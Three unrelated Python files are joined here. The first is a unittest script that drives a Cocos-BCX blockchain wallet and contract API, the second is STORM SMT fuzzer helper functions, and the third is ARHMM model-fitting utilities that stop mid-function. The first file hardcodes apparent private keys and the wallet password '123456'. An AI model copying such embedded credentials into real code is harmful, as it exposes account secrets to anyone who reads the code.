#-*- coding: utf-8 -*-
import unittest
import os
import sys
import json
import requests
import time
import hashlib
import random
import string
cli_wallet_url = "http://127.0.0.1:8047"
headers = {"content-type": "application/json"}
chain_url = "http://127.0.0.1:8149" # some interfaces are missing from cli_wallet, so use the chain API
# curl https://api.cocosbcx.net
# -d '{"id":1, "method":"call", "params":[0,"get_accounts",[["1.2.5", "1.2.100"]]]}'
def request_post(req_data, is_assert=True, response_log=True, url=cli_wallet_url):
response = json.loads(requests.post(url, data = json.dumps(req_data), headers = headers).text)
print('>> {} {}'.format(req_data['method'], req_data['params']))
if response_log:
#print('\033[1;32;40m')
print("{}\n".format(response))
#print('\033[0m')
if is_assert:
assert 'error' not in response
return response
def random_uppercases(n):
return ''.join([random.choice(string.ascii_uppercase) for i in range(n)])
def random_lowercases(n):
return ''.join([random.choice(string.ascii_lowercase) for i in range(n)])
############# global var
g_owner = "nicotest"
g_pub_key = "COCOS56a5dTnfGpuPoWACnYj65dahcXMpTrNQkV3hHWCFkLxMF5mXpx"
g_pri_key = "5J2SChqa9QxrCkdMor9VC2k9NT4R4ctRrJA6odQCPkb3yL89vxo"
# mainnet
#g_owner = "faucet1"
#g_pub_key = "COCOS4z37sP33MsZS3a94RW3gukpunTcod5yZNDvJskPuhUtDf8Q9rp"
#g_pri_key = "5JcR8oHjMAFqKVdx3SSwM1Ff*********************"
g_contract_name = "contract.gastest100"
g_function_name = "collateral"
g_contract_lua_code = "function {}(to, amount) chainhelper:update_collateral_for_gas('',to,amount) end".format(
g_function_name)
wallet_password = "123456"
g_account2 = "init0"
g_pri_key2 = "5Kj5s6xAkjbFcsGXhP4ioWUk7dZm5aYyKDEWDbWAa5nwA8Paewc"
gas_precision = 100000
transfer_amount = 100000 # core asset
############ end
# std::pair<vector<nh_asset_object>, uint32_t> wallet_api::list_account_nh_asset(
# const string &nh_asset_owner,
# const vector<string> &world_view_name_or_ids,
# uint32_t pagesize,
# uint32_t page,
# nh_asset_list_type list_type)
# {
# return my->_remote_db->list_account_nh_asset(get_account(nh_asset_owner).id, world_view_name_or_ids, pagesize, page, list_type);
# }
#default list_type = owner_and_active
def list_account_nh_asset(owner, world_view_name_or_ids, list_type=4):
print(">>> list_account_nh_asset")
default_pagesize = 5
default_page = 1
req_data = {
"jsonrpc": "2.0",
"method": "list_account_nh_asset",
"params": [owner, world_view_name_or_ids, default_pagesize, default_page, list_type],
"id":1
}
return request_post(req_data, response_log=True)
def list_account_balances(name_or_id):
req_data = {
"jsonrpc": "2.0",
"method": "list_account_balances",
"params": [name_or_id],
"id":1
}
return request_post(req_data, response_log=True)
def get_contract(name_or_id):
req_data = {
"jsonrpc": "2.0",
"method": "get_contract",
"params": [name_or_id],
"id":1
}
response = request_post(req_data)
return response
def register_nh_asset_creator_if_not(account):
req_data = {
"jsonrpc": "2.0",
"method": "register_nh_asset_creator",
"params": [account, 'true'],
"id":1
}
response = request_post(req_data, is_assert=False)
if 'error' in response:
err_message = response['error']['message']
if err_message.find('You had registered to a nh asset creater') != -1:
return True
return False
time.sleep(2)
return True
def lookup_world_view(world_view):
req_data = {
"jsonrpc": "2.0",
"method": "call",
"params": [0, "lookup_world_view", [[world_view]]],
"id":1
}
return request_post(req_data, is_assert=False, url=chain_url)['result']
def create_world_view_if_not_exist(owner, world_view):
result = lookup_world_view(world_view)
if result == [None]:
print("create_world_view")
req_data = {
"jsonrpc": "2.0",
"method": "create_world_view",
"params": [owner, world_view,'true'],
"id":1
}
request_post(req_data)
time.sleep(2)
def contract_create_if_not_exist(owner, contract_name, pub_key, file_name):
req_data = {
"jsonrpc": "2.0",
"method": "get_contract",
"params": [contract_name],
"id":1
}
response = request_post(req_data, is_assert=False)
if 'error' in response:
req_data = {
"jsonrpc": "2.0",
"method": "create_contract_from_file",
"params": [owner, contract_name, pub_key, file_name, 'true'],
"id":1
}
request_post(req_data)
time.sleep(2)
def revise_contract(owner, contract_name, file_name, revise=False):
req_data = {
"jsonrpc": "2.0",
"method": "get_contract",
"params": [contract_name],
"id":1
}
response = request_post(req_data, is_assert=False)
if 'error' not in response:
req_data = {
"jsonrpc": "2.0",
"method": "revise_contract_from_file",
"params": [owner, contract_name, file_name, 'true'],
"id":1
}
request_post(req_data)
time.sleep(2)
def call_contract(caller, contract, function, params, is_assert=True):
# print('params: {}, type: {}'.format(params, type(params)))
req_data = {
"jsonrpc": "2.0",
"method": "call_contract_function",
"params": [caller, contract, function, params, 'true'],
"id":1
}
return request_post(req_data, is_assert, response_log=True)
def import_key_if_not_exist(name, private_key):
req_data = {
"jsonrpc": "2.0",
"method": "list_my_accounts",
"params": [],
"id":1
}
accounts = request_post(req_data, response_log=False)['result']
flag = True
for account in accounts:
if account['name'] == name or account['id'] == name:
flag = False
break
if flag:
req_data = {
"jsonrpc": "2.0",
"method": "import_key",
"params": [name, private_key],
"id":1
}
request_post(req_data)
def get_transaction_by_id(tx_id):
req_data = {
"jsonrpc": "2.0",
"method": "get_transaction_by_id",
"params": [tx_id],
"id":1
}
return request_post(req_data)
def get_object(id):
req_data = {
"jsonrpc": "2.0",
"method": "get_object",
"params": [id],
"id":1
}
return request_post(req_data)['result']
def get_contract_call_tx_result(tx_id):
    # time.sleep(2)  # make sure the contract has already been executed
operation_results = get_transaction_by_id(tx_id)['result']['operation_results']
print("tx_id: {}, result: {}".format(tx_id, operation_results))
return operation_results
# for op_result in operation_results:
# print(op_result)
# # print(op_result[1]['contract_affecteds'])
def hash256(src):
sha256 = hashlib.sha256()
sha256.update(src.encode('utf-8'))
return sha256.hexdigest()
def hash512(src):
sha512 = hashlib.sha512()
sha512.update(src.encode('utf-8'))
return sha512.hexdigest()
class contract_api_case_test(unittest.TestCase):
@classmethod
def setUpClass(self):
req_data = {
"jsonrpc": "2.0",
"method": "unlock",
"params": [wallet_password],
"id":1
}
request_post(req_data)
import_key_if_not_exist(g_owner, g_pri_key)
self.contract_basic_name = "contract.testapi"
print('{} done\n'.format(sys._getframe().f_code.co_name))
@classmethod
def tearDownClass(self):
req_data = {
"jsonrpc": "2.0",
"method": "lock",
"params": [],
"id":1
}
request_post(req_data)
print('{} done\n'.format(sys._getframe().f_code.co_name))
@unittest.skipIf(False, "test other")
def test_contract_head_block_time(self):
contract_name = self.contract_basic_name + "13.headblocktime"
file_name = os.getcwd() + "/contract_13_head_block_time.lua"
function = "test_head_block_time"
params = []
contract_create_if_not_exist(g_owner, contract_name, g_pub_key, file_name)
# revise_contract(g_owner, contract_name, file_name)
for i in range(0, 600):
print("\n## call contract {} count: {}".format(contract_name, i))
result = call_contract(g_owner, contract_name, function, params)['result']
tx_id = result[0]
get_contract_call_tx_result(tx_id)
print('{} done\n'.format(sys._getframe().f_code.co_name))
if __name__ == "__main__":
unittest.main()
|
"""
Copyright 2020 MPI-SWS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from z3 import *
from storm.fuzzer.helper_functions import get_tree_depth
def get_max_depth(file_path):
max_depth = 0
ast = parse_smt2_file(file_path)
for assertion in ast:
assertion_depth = get_tree_depth(assertion, 64, optimization=False)
if assertion_depth > max_depth:
max_depth = assertion_depth
return max_depth
def count_asserts(file_path):
number_of_assertions = 0
with open(file_path, 'r') as f:
lines = f.read().splitlines()
for line in lines:
if line.find("(assert") != -1:
number_of_assertions += 1
return number_of_assertions
def count_lines(file_path):
with open(file_path, 'r') as f:
lines = f.read().splitlines()
return len(lines) |
import os
import matplotlib.pyplot as plt
import numpy as np
import pickle
from ssm import HMM
from ssm.messages import forward_pass
from scipy.special import logsumexp
from sklearn.metrics import r2_score
# -------------------------------------------------------------------------------------------------
# model fitting functions
# -------------------------------------------------------------------------------------------------
def collect_model_kwargs(
n_lags_standard, n_lags_sticky, n_lags_recurrent, kappas, observations,
observation_kwargs={}, hierarchical=False, fit_hmm=False):
"""Collect model kwargs.
Args:
n_lags_standard (array-like): number of ar lags for standard transitions
n_lags_sticky (array-like): number of ar lags for sticky transitions
n_lags_recurrent (array-like): number of ar lags for recurrent transitions
kappas (array-like): hyperparam for upweighting diagonal when using sticky transitions
observations (str): 'ar' | 'diagonal_ar' | 'robust_ar' | 'diagonal_robust_ar'
observation_kwargs (dict): additional kwargs for obs (e.g. tags for hierarchical models)
hierarchical (bool): True to fit model with hierarchical observations
fit_hmm (bool): True to include hmm in collected models
Returns:
dict
"""
model_kwargs = {}
if hierarchical:
if len(n_lags_recurrent) > 0 or len(n_lags_sticky) > 0:
raise NotImplementedError('Cannot fit hierarchical models on recurrent or sticky obs')
hier_str = 'hierarchical_'
else:
hier_str = ''
# add hmms with standard transitions
if fit_hmm:
model_kwargs['hmm'] = {
'transitions': 'standard',
'observations': hier_str + 'gaussian',
'observation_kwargs': observation_kwargs}
# add models with standard transitions
for lags in n_lags_standard:
model_kwargs['arhmm-%i' % lags] = {
'transitions': 'standard',
'observations': hier_str + observations,
'observation_kwargs': {**{'lags': lags}, **observation_kwargs}}
# add models with sticky transitions
for lags in n_lags_sticky:
for kappa in kappas:
kap = int(np.log10(kappa))
model_kwargs['arhmm-s%i-%i' % (kap, lags)] = {
'transitions': 'sticky',
'transition_kwargs': {'kappa': kappa},
'observations': hier_str + observations,
'observation_kwargs': {**{'lags': lags}, **observation_kwargs}}
# add models with recurrent transitions
for lags in n_lags_recurrent:
model_kwargs['rarhmm-%i' % lags] = {
'transitions': 'recurrent',
'observations': hier_str + observations,
'observation_kwargs': {**{'lags': lags}, **observation_kwargs}}
return model_kwargs
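# A small illustration (not part of the original module) of the dictionary that
# collect_model_kwargs builds; the lag and kappa values below are arbitrary assumptions.
def _example_collect_model_kwargs():
    """Return kwargs for two standard ARHMMs, one sticky ARHMM and one recurrent ARHMM."""
    kwargs = collect_model_kwargs(
        n_lags_standard=[1, 2],
        n_lags_sticky=[1],
        n_lags_recurrent=[1],
        kappas=[1e4],
        observations='ar')
    # expected keys: 'arhmm-1', 'arhmm-2', 'arhmm-s4-1', 'rarhmm-1'
    return kwargs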
def fit_with_random_restarts(
K, D, obs, lags, datas, transitions='stationary', tags=None, num_restarts=5, num_iters=100,
method='em', tolerance=1e-4, save_path=None, init_type='kmeans', dist_mat=None,
cond_var_A=1e-3, cond_var_V=1e-3, cond_var_b=1e-1, **kwargs):
all_models = []
all_lps = []
if not os.path.exists(save_path):
os.makedirs(save_path)
# Fit the model with a few random restarts
for r in range(num_restarts):
print("Restart ", r)
np.random.seed(r)
# build model file
model_kwargs = {
'transitions': transitions,
'observations': obs,
'observation_kwargs': {'lags': lags},
}
model_name = get_model_name(K, model_kwargs)
save_file = os.path.join(save_path, model_name + '_init-%i.pkl' % r)
print(save_file)
if os.path.exists(save_file):
print('loading results from %s' % save_file)
with open(save_file, 'rb') as f:
results = pickle.load(f)
model = results['model']
lps = results['lps']
else:
observation_kwargs = dict(lags=lags)
if obs.find('hierarchical') > -1:
observation_kwargs['cond_variance_A'] = cond_var_A
observation_kwargs['cond_variance_V'] = cond_var_V
observation_kwargs['cond_variance_b'] = cond_var_b
observation_kwargs['cond_dof_Sigma'] = 10
observation_kwargs['tags'] = np.unique(tags)
if transitions.find('hierarchical') > -1:
transition_kwargs = {'tags': np.unique(tags)}
else:
transition_kwargs = None
model = HMM(
K, D,
observations=obs, observation_kwargs=observation_kwargs,
transitions=transitions, transition_kwargs=transition_kwargs)
init_model(init_type, model, datas, dist_mat=dist_mat)
lps = model.fit(
datas, tags=tags, method=method, tolerance=tolerance,
num_iters=num_iters, # em
# num_epochs=num_iters, # stochastic em
initialize=False,
**kwargs)
results = {'model': model, 'lps': lps}
with open(save_file, 'wb') as f:
pickle.dump(results, f)
all_models.append(model)
all_lps.append(lps)
if isinstance(lps, tuple):
best_model_idx = np.argmax([lps[0][-1] for lps in all_lps])
else:
best_model_idx = np.argmax([lps[-1] for lps in all_lps])
best_model = all_models[best_model_idx]
best_lps = all_lps[best_model_idx]
return best_model, best_lps, all_models, all_lps
def init_model(init_type, model, datas, inputs=None, masks=None, tags=None, dist_mat=None):
"""Initialize ARHMM model according to one of several schemes.
The different schemes correspond to different ways of assigning discrete states to the data
points; once these states have been assigned, linear regression is used to estimate the model
parameters (dynamics matrices, biases, covariance matrices)
* init_type = random: states are randomly and uniformly assigned
* init_type = kmeans: perform kmeans clustering on data; note that this is not a great scheme
for arhmms on the fly data, because the fly is often standing still in many different
poses. These poses will be assigned to different clusters, thus breaking the "still" state
into many initial states
* init_type = diff-clust: perform kmeans clustering on differenced data
* init_type = pca_me: first compute the motion energy of the data (square of differences of
consecutive time points) and then perform PCA. A threshold applied to the first dimension
does a reasonable job of separating the data into "moving" and "still" timepoints. All
"still" timepoints are assigned one state, and the remaining timepoints are clustered using
kmeans with (K-1) clusters
* init_type = arhmm: refinement of pca_me approach: perform pca on the data and take top 4
components (to speed up computation) and fit a 2-state arhmm to roughly split the data into
"still" and "moving" states (this is itself initialized with pca_me). Then as before the
moving state is clustered into K-1 states using kmeans.
Args:
init_type (str):
'random' | 'kmeans' | 'pca_me' | 'arhmm'
model (ssm.HMM object):
datas (list of np.ndarrays):
inputs (list of np.ndarrays):
masks (list of np.ndarrays):
tags (list of np.ndarrays):
"""
from ssm.util import one_hot
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from scipy.signal import savgol_filter
from scipy.stats import norm
Ts = [data.shape[0] for data in datas]
K = model.K
D = model.observations.D
M = model.observations.M
lags = model.observations.lags
if inputs is None:
inputs = [np.zeros((data.shape[0],) + (M,)) for data in datas]
elif not isinstance(inputs, (list, tuple)):
inputs = [inputs]
if masks is None:
masks = [np.ones_like(data, dtype=bool) for data in datas]
elif not isinstance(masks, (list, tuple)):
masks = [masks]
if tags is None:
tags = [None] * len(datas)
elif not isinstance(tags, (list, tuple)):
tags = [tags]
# --------------------------
# initialize discrete states
# --------------------------
if init_type == 'random':
zs = [np.random.choice(K, size=T) for T in Ts]
elif init_type == 'umap-kmeans':
import umap
u = umap.UMAP()
xs = u.fit_transform(np.vstack(datas))
km = KMeans(K)
km.fit(xs)
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'umap-kmeans-diff':
import umap
u = umap.UMAP()
datas_diff = [np.vstack([np.zeros((1, D)), np.diff(data, axis=0)]) for data in datas]
xs = u.fit_transform(np.vstack(datas_diff))
km = KMeans(K)
km.fit(xs)
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'kmeans':
km = KMeans(K)
km.fit(np.vstack(datas))
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'kmeans-diff':
km = KMeans(K)
datas_diff = [np.vstack([np.zeros((1, D)), np.diff(data, axis=0)]) for data in datas]
km.fit(np.vstack(datas_diff))
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'kmeans-move':
D_ = 4
if datas[0].shape[1] > D_:
# perform pca
pca = PCA(D_)
xs = pca.fit_transform(np.vstack(datas))
xs = np.split(xs, np.cumsum(Ts)[:-1])
else:
# keep original data
import copy
D_ = D
xs = copy.deepcopy(datas)
model_init = HMM(
K=2, D=D_, M=0, transitions='standard', observations='ar',
            observation_kwargs={'lags': 1})
init_model('pca-me', model_init, xs)
model_init.fit(
xs, inputs=None, method='em', num_iters=100, tolerance=1e-2,
initialize=False, transitions_mstep_kwargs={'optimizer': 'lbfgs', 'tol': 1e-3})
# make still state 0th state
mses = [np.mean(np.square(model_init.observations.As[i] - np.eye(D_))) for i in range(2)]
if mses[1] < mses[0]:
# permute states
model_init.permute([1, 0])
moving_state = 1
inputs_tr = [None] * len(datas)
zs = [model_init.most_likely_states(x, u) for x, u in zip(xs, inputs_tr)]
zs = np.concatenate(zs, axis=0)
# cluster moving data
km = KMeans(K - 1)
if np.sum(zs == moving_state) > K - 1:
datas_diff = [np.vstack([np.zeros((1, D)), np.diff(data, axis=0)]) for data in datas]
km.fit(np.vstack(datas_diff)[zs == moving_state])
zs[zs == moving_state] = km.labels_ + 1
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
elif init_type == 'ar-clust':
from sklearn.cluster import SpectralClustering # , AgglomerativeClustering
# code from Josh Glaser
t_win = 5
t_gap = 5
num_trials = len(datas)
if dist_mat is None:
dist_mat = compute_dist_mat(datas, t_win, t_gap)
# Cluster!
clustering = SpectralClustering(n_clusters=K, affinity='precomputed').fit(
1 / (1 + dist_mat / t_win))
# Now take the clustered segments, and use them to determine the cluster of the individual
# time points
# In the scenario where the segments are nonoverlapping, then we can simply assign the time
# point cluster as its segment cluster
# In the scenario where the segments are overlapping, we will let a time point's cluster be
# the cluster to which the majority of its segments belonged
# Below zs_init is the assigned discrete states of each time point for a trial. zs_init2
# tracks the clusters of each time point across all the segments it's part of
zs = []
for tr in range(num_trials):
xhat = datas[tr]
T = xhat.shape[0]
n_steps = int((T - t_win) / t_gap) + 1
t_st = 0
zs_init = np.zeros(T)
zs_init2 = np.zeros([T, K]) # For each time point, tracks how many segments it's
# part of belong to each cluster
for k in range(n_steps):
t_end = t_st + t_win
t_idx = np.arange(t_st, t_end)
if t_gap == t_win:
zs_init[t_idx] = clustering.labels_[k]
else:
zs_init2[t_idx, clustering.labels_[k]] += 1
t_st = t_st + t_gap
if t_gap != t_win:
max_els = zs_init2.max(axis=1)
for t in range(T):
if np.sum(zs_init2[t] == max_els[t]) == 1:
# if there's a single best cluster, assign it
zs_init[t] = np.where(zs_init2[t] == max_els[t])[0]
else:
# multiple best clusters
if zs_init[t - 1] in np.where(zs_init2[t] == max_els[t])[0]:
# use best cluster from previous time point if it's in the running
zs_init[t] = zs_init[t - 1]
else:
# just use first element
zs_init[t] = np.where(zs_init2[t] == max_els[t])[0][0]
# I think this offset is correct rather than just using zs_init, but it should be
# double checked.
zs.append(np.concatenate([[0], zs_init[:-1]]))
zs = np.concatenate(zs, axis=0)
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
elif init_type == 'arhmm':
D_ = 4
if datas[0].shape[1] > D_:
# perform pca
pca = PCA(D_)
xs = pca.fit_transform(np.vstack(datas))
xs = np.split(xs, np.cumsum(Ts)[:-1])
else:
# keep original data
import copy
D_ = D
xs = copy.deepcopy(datas)
model_init = HMM(
K=2, D=D_, M=0, transitions='standard', observations='ar',
            observation_kwargs={'lags': 1})
init_model('pca-me', model_init, xs)
model_init.fit(
xs, inputs=None, method='em', num_iters=100, tolerance=1e-2,
initialize=False, transitions_mstep_kwargs={'optimizer': 'lbfgs', 'tol': 1e-3})
# make still state 0th state
mses = [np.mean(np.square(model_init.observations.As[i] - np.eye(D_))) for i in range(2)]
if mses[1] < mses[0]:
# permute states
model_init.permute([1, 0])
moving_state = 1
inputs_tr = [None] * len(datas)
zs = [model_init.most_likely_states(x, u) for x, u in zip(xs, inputs_tr)]
zs = np.concatenate(zs, axis=0)
# cluster moving data
km = KMeans(K - 1)
if np.sum(zs == moving_state) > K - 1:
km.fit(np.vstack(datas)[zs == moving_state])
zs[zs == moving_state] = km.labels_ + 1
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
elif init_type == 'pca-me':
# pca on motion energy
datas_filt = np.copy(datas)
for dtmp in datas_filt:
for i in range(dtmp.shape[1]):
dtmp[:, i] = savgol_filter(dtmp[:, i], 5, 2)
pca = PCA(1)
me = np.square(np.diff(np.vstack(datas_filt), axis=0))
xs = pca.fit_transform(np.concatenate([np.zeros((1, D)), me], axis=0))[:, 0]
xs = xs / np.max(xs)
# threshold data to get moving/non-moving
thresh = 0.01
zs = np.copy(xs)
zs[xs < thresh] = 0
zs[xs >= thresh] = 1
# cluster moving data
km = KMeans(K - 1)
km.fit(np.vstack(datas)[zs == 1])
zs[zs == 1] = km.labels_ + 1
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
else:
raise NotImplementedError('Invalid "init_type" of "%s"' % init_type)
# ------------------------
# estimate dynamics params
# ------------------------
if init_type != 'em-exact':
Ezs = [one_hot(z, K) for z in zs]
expectations = [(Ez, None, None) for Ez in Ezs]
if str(model.observations.__class__).find('Hierarchical') > -1:
obs = model.observations
# initialize parameters for global ar model
obs.global_ar_model.m_step(expectations, datas, inputs, masks, tags)
# update prior
obs._update_hierarchical_prior()
# Copy global parameters to per-group models
for ar in obs.per_group_ar_models:
ar.As = obs.global_ar_model.As.copy()
ar.Vs = obs.global_ar_model.Vs.copy()
ar.bs = obs.global_ar_model.bs.copy()
ar.Sigmas = obs.global_ar_model.Sigmas.copy()
ar.As = norm.rvs(obs.global_ar_model.As, np.sqrt(obs.cond_variance_A))
ar.Vs = norm.rvs(obs.global_ar_model.Vs, np.sqrt(obs.cond_variance_V))
ar.bs = norm.rvs(obs.global_ar_model.bs, np.sqrt(obs.cond_variance_b))
ar.Sigmas = obs.global_ar_model.Sigmas.copy()
else:
model.observations.m_step(expectations, datas, inputs, masks, tags)
return None
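# A minimal usage sketch (not part of the original module): build a 5-state ARHMM and
# initialise its discrete states with the motion-energy scheme described above before
# fitting.  The dimensions and fitting options are illustrative assumptions.
def _example_init_and_fit(datas):
    """`datas` is assumed to be a list of (T, 8) float arrays."""
    model = HMM(
        K=5, D=8, M=0, transitions='standard',
        observations='ar', observation_kwargs={'lags': 1})
    init_model('pca-me', model, datas)
    lps = model.fit(datas, method='em', num_iters=50, initialize=False)
    return model, lps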
def compute_dist_mat(datas, t_win, t_gap):
def sse(x, y):
return np.sum(np.square(x - y))
from sklearn.linear_model import Ridge
Ts = [data.shape[0] for data in datas]
num_trials = len(datas)
# Elements of segs contain triplets of
# 1) trial
# 2) time point of beginning of segment
# 3) time point of end of segment
segs = []
# Get all segments based on predefined t_win and t_gap
for tr in range(num_trials):
T = Ts[tr]
n_steps = int((T - t_win) / t_gap) + 1
for k in range(n_steps):
segs.append([tr, k * t_gap, k * t_gap + t_win])
# Fit a regression (solve for the dynamics matrix) within each segment
num_segs = len(segs)
sse_mat = np.zeros([num_segs, num_segs])
for j, seg in enumerate(segs):
[tr, t_st, t_end] = seg
X = datas[tr][t_st:t_end + 1, :]
rr = Ridge(alpha=1, fit_intercept=True)
rr.fit(X[:-1], X[1:] - X[:-1])
# Then see how well the dynamics from segment J works at making predictions on
# segment K (determined via sum squared error of predictions)
for k, seg2 in enumerate(segs):
[tr, t_st, t_end] = seg2
X = datas[tr][t_st:t_end + 1, :]
sse_mat[j, k] = sse(X[1:] - X[:-1], rr.predict(X[:-1]))
# Make "sse_mat" into a proper, symmetric distance matrix for clustering
tmp = sse_mat - np.diag(sse_mat)
dist_mat = tmp + tmp.T
return dist_mat
# -------------------------------------------------------------------------------------------------
# model evaluation functions
# -------------------------------------------------------------------------------------------------
def extract_state_runs(states, indxs, min_length=20):
"""
Find contiguous chunks of data with the same state
Args:
states (list):
indxs (list):
min_length (int):
Returns:
list
"""
K = len(np.unique(np.concatenate([np.unique(s) for s in states])))
state_snippets = [[] for _ in range(K)]
for curr_states, curr_indxs in zip(states, indxs):
i_beg = 0
curr_state = curr_states[i_beg]
curr_len = 1
for i in range(1, len(curr_states)):
next_state = curr_states[i]
if next_state != curr_state:
# record indices if state duration long enough
if curr_len >= min_length:
state_snippets[curr_state].append(
curr_indxs[i_beg:i])
i_beg = i
curr_state = next_state
curr_len = 1
else:
curr_len += 1
# end of trial cleanup
if next_state == curr_state:
# record indices if state duration long enough
if curr_len >= min_length:
state_snippets[curr_state].append(curr_indxs[i_beg:i])
return state_snippets
def viterbi_ll(model, datas):
"""Calculate log-likelihood of viterbi path."""
inputs = [None] * len(datas)
masks = [None] * len(datas)
tags = [None] * len(datas)
states = [model.most_likely_states(x, u) for x, u in zip(datas, inputs)]
ll = 0
for data, input, mask, tag, state in zip(datas, inputs, masks, tags, states):
if input is None:
input = np.zeros_like(data)
if mask is None:
mask = np.ones_like(data, dtype=bool)
likelihoods = model.observations.log_likelihoods(data, input, mask, tag)
ll += np.sum(likelihoods[(np.arange(state.shape[0]), state)])
return ll
def k_step_ll(model, datas, k_max):
"""Determine the k-step ahead ll."""
M = (model.M,) if isinstance(model.M, int) else model.M
L = model.observations.lags # AR lags
k_step_lls = 0
for data in datas:
input = np.zeros((data.shape[0],) + M)
mask = np.ones_like(data, dtype=bool)
pi0 = model.init_state_distn.initial_state_distn
Ps = model.transitions.transition_matrices(data, input, mask, tag=None)
lls = model.observations.log_likelihoods(data, input, mask, tag=None)
T, K = lls.shape
# Forward pass gets the predicted state at time t given
# observations up to and including those from time t
alphas = np.zeros((T, K))
forward_pass(pi0, Ps, lls, alphas)
# pz_tt = p(z_{t}, x_{1:t}) = alpha(z_t) / p(x_{1:t})
pz_tt = np.exp(alphas - logsumexp(alphas, axis=1, keepdims=True))
log_likes_list = []
for k in range(k_max + 1):
if k == 0:
# p(x_t | x_{1:T}) = \sum_{z_t} p(x_t | z_t) p(z_t | x_{1:t})
pz_tpkt = np.copy(pz_tt)
assert np.allclose(np.sum(pz_tpkt, axis=1), 1.0)
log_likes_0 = logsumexp(lls[k_max:] + np.log(pz_tpkt[k_max:]), axis=1)
# pred_data = get_predicted_obs(model, data, pz_tpkt)
else:
if k == 1:
# p(z_{t+1} | x_{1:t}) =
# \sum_{z_t} p(z_{t+1} | z_t) alpha(z_t) / p(x_{1:t})
pz_tpkt = np.copy(pz_tt)
# p(z_{t+k} | x_{1:t}) =
# \sum_{z_{t+k-1}} p(z_{t+k} | z_{t+k-1}) p(z_{z+k-1} | x_{1:t})
if Ps.shape[0] == 1: # stationary transition matrix
pz_tpkt = np.matmul(pz_tpkt[:-1, None, :], Ps)[:, 0, :]
else: # dynamic transition matrix
pz_tpkt = np.matmul(pz_tpkt[:-1, None, :], Ps[k - 1:])[:, 0, :]
assert np.allclose(np.sum(pz_tpkt, axis=1), 1.0)
# p(x_{t+k} | x_{1:t}) =
# \sum_{z_{t+k}} p(x_{t+k} | z_{t+k}) p(z_{t+k} | x_{1:t})
log_likes = logsumexp(lls[k:] + np.log(pz_tpkt), axis=1)
# compute summed ll only over timepoints that are valid for each value of k
log_likes_0 = log_likes[k_max - k:]
log_likes_list.append(np.sum(log_likes_0))
k_step_lls += np.array(log_likes_list)
return k_step_lls
def k_step_r2(
model, datas, k_max, n_samp=10, obs_noise=True, disc_noise=True, return_type='total_r2'):
"""Determine the k-step ahead r2.
Args:
model:
datas:
k_max:
n_samp:
obs_noise: bool
turn observation noise on/off
disc_noise: bool
turn discrete state sampling on/off
return_type:
'per_batch_r2'
'total_r2'
'bootstrap_r2'
'per_batch_mse'
Returns:
"""
N = len(datas)
L = model.observations.lags # AR lags
D = model.D
x_true_total = []
x_pred_total = [[] for _ in range(k_max)]
if return_type == 'per_batch_r2':
k_step_r2s = np.zeros((N, k_max, n_samp))
elif return_type == 'total_r2':
k_step_r2s = np.zeros((k_max, n_samp))
else:
raise NotImplementedError('"%s" is not a valid return type' % return_type)
for d, data in enumerate(datas):
# print('%i/%i' % (d + 1, len(datas)))
T = data.shape[0]
x_true_all = data[L + k_max - 1: T + 1]
x_pred_all = np.zeros((n_samp, (T - 1), D, k_max))
if not disc_noise:
zs = model.most_likely_states(data)
inputs = np.zeros((T,) + (model.observations.M,))
# collect sampled data
for t in range(L - 1, T):
# find the most likely discrete state at time t based on its past
if disc_noise:
data_t = data[:t + 1]
zs = model.most_likely_states(data_t)[-L:]
else:
pass
# sample forward in time n_samp times
for n in range(n_samp):
# sample forward in time k_max steps
if disc_noise:
_, x_pred = model.sample(
k_max, prefix=(zs, data_t[-L:]), with_noise=obs_noise)
else:
pad = L
x_pred = np.concatenate((data[t - L + 1:t + 1], np.zeros((k_max, D))))
for k in range(pad, pad + k_max):
if t + 1 + k - pad < T:
x_pred[k, :] = model.observations.sample_x(
zs[t + 1 + k - pad], x_pred[:k], input=inputs[t], tag=None,
with_noise=obs_noise)
else:
# beyond the end of the data sample; return zeros
pass
x_pred = x_pred[pad:]
# predicted x values in the forward prediction time
x_pred_all[n, t - L + 1, :, :] = np.transpose(x_pred)[None, None, :, :]
# store predicted data
x_true_total.append(x_true_all)
for k in range(k_max):
idxs = (k_max - k - 1, k_max - k - 1 + x_true_all.shape[0])
x_pred_total[k].append(x_pred_all[:, slice(*idxs), :, k])
# compute r2s
if return_type == 'per_batch_r2':
for d in range(len(datas)):
for k in range(k_max):
for n in range(n_samp):
k_step_r2s[d, k, n] = r2_score(
x_true_total[d], x_pred_total[k][d][n])
elif return_type == 'total_r2':
for k in range(k_max):
for n in range(n_samp):
k_step_r2s[k, n] = r2_score(
np.vstack(x_true_total),
np.vstack([x_pred_total[k][d][n] for d in range(len(datas))]))
return k_step_r2s
# -------------------------------------------------------------------------------------------------
# path handling functions
# -------------------------------------------------------------------------------------------------
def get_model_name(n_states, model_kwargs):
trans = model_kwargs['transitions']
obs = model_kwargs['observations']
if obs.find('ar') > -1:
lags = model_kwargs['observation_kwargs']['lags']
else:
lags = 0
if trans == 'sticky':
kappa = model_kwargs['transition_kwargs']['kappa']
else:
kappa = ''
model_name = str(
'obs=%s_trans=%s_lags=%i_K=%02i' % (obs, trans, lags, n_states))
if trans == 'sticky':
model_name = str('%s_kappa=%1.0e' % (model_name, kappa))
return model_name
def plot_latents_states(
latents=None, states=None, state_probs=None, slc=(0, 1000), m=20):
"""
states | state probs | x coords | y coords
Args:
latents (dict): keys are 'x', 'y', 'l', each value is a TxD np array
states (np array): length T
state_probs (np array): T x K
"""
n_dlc_comp = latents.shape[1]
if state_probs is not None:
fig, axes = plt.subplots(
3, 1, figsize=(12, 10),
gridspec_kw={'height_ratios': [0.1, 0.1, 0.4]})
else:
fig, axes = plt.subplots(
